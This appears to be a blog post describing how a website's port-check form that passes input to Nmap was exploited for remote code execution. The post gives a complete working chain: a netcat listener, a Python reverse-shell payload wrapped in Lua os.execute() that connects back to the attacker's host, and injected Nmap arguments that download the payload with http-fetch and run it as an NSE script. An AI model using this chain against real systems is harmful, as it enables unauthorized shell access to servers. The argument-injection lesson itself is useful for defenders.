Interesting case with code execution in Nmap

A very long time ago there was an interesting case with a site for system administrators, where you could check if the port of site opened (there were two inputs for IP and port).

The first thing that came to my mind was to enter in the IP:
127.0.0.1 -h
As a result, the site returned the manual page of Nmap. But many characters were filtered and it was not possible to bypass filters. After that, through many attempts, an interesting remote code execution vector was found.

Nmap has a module named http-fetch that can navigate URLs and download files. Moreover, you can even specify where to save the file. Reading documentation of Nmap to figure out how NSE scripts work, it was found that commands can be executed through the os.execute() function. So now we have all parts of puzzle.

0) Open port 8888 on your server:
nc -lvp 8888
Let’s say your server IP is 1.1.1.1

1) Create an index.php file on your server with the following content:

os.execute("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.1.1.1\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")

2) Run built-in web server of php:
php -S 0.0.0.0:8080

3) On the victim site, instead of IP, write:
1.1.1.1 -script http-fetch
Instead of port:
8080 -dd -script-args destination=/tmp

In the backend of site, something like this will run:
nmap 1.1.1.1 -script http-fetch -p 8080 -dd -script-args destination=/tmp

As a result of this command, the path /tmp/1.1.1.1/8080/index.html will contain the script from the first step.

4) Run the downloaded script by entering this instead of the port:
8080 -dd -script /tmp/1.1.1.1/8080/index.html

If everything is right, you will get backconnect to your 1.1.1.1:8888.

Thus, sometimes it is not necessary to bypass filters or try to execute second command entering characters like | & ;.

Zeroday ­čśÇ

Leave a comment

Your email address will not be published.